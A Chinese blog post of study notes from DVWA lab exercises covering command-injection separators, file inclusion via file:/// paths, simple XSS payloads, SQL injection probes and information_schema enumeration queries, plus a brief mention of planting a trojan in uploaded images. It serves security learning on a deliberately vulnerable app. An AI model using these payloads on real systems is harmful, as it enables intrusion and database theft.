dvwa 总结(命令注入参数,文件包含,文件上传,xss,sql注入)

命令执行

dvwa测试过程中用到的命令执行参数:
&&

command1 && command2

先执行command1,若command1为真后在执行command2

&

command1 & command2 

command1和command2同时执行,不管command1是否执行成功

||

command1 || command2

先执行command1,若command为假在执行command2

|

command1 | command2

只执行command2

command1 ; command2

先执行command1在执行command2

文件包含

总结:
1、在浏览器上修改所包含的文件名
2、bp抓包修改文件的mime和文件名
3、在文件或图片中写入木马

dvwa中文件包含high中用到此语法:

file:///文件路径

file协议:本地文件传输协议 主要用于访问本地计算机中的文件。
例如:file:///D:\phpstudy_pro\WWW\DVWA-master\php.ini

XSS

xss跨站脚本攻击,攻击者通过往web页面里插入恶意的script代码,当用户浏览页面时,嵌入web里的script代码就会被执行,从而达到攻击的目的。xss攻击是针对用户层面
xss dom

<script>alert('1')</script>
<img src=1 onerror=alert('2')>

xss Reflected
某件事情你干不了,但是你可以想办法把要干的事情告诉别人,让别人把这件事情干了并把结果反馈给你。
带入到反射型xss中,我想对服务器做一件不好的事情,但是我没有服务器的操作权限,我可以提交代码给服务器,服务器会自己执行代码并把结果返回到浏览器上,如此便能得到我想要的结果

xss stored
也叫持久型XSS,特征是攻击代码会被存储在数据库等存储介质中,因此功效持久。

sql注入

判断类型,是字符型注入还是数值型注入
测试语句大概如下:
1
1’
1’ or 1=1
1’ and 1=1
1’ and 1=2
1’ and ‘1’='1

查看基本信息
select version(),database()

查看数据库中的表
select group_concat(table_name) from information_schema.tables where table_schema=database()

查看表中的字段
select group_concat(column_name) from information_schema.columns where table_name=‘—’

查看表的内容
select group_concat(字段1),group_concat(字段2) from 表名

ps:勤更换思路啊,勤F12啊啊,啊,啊

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值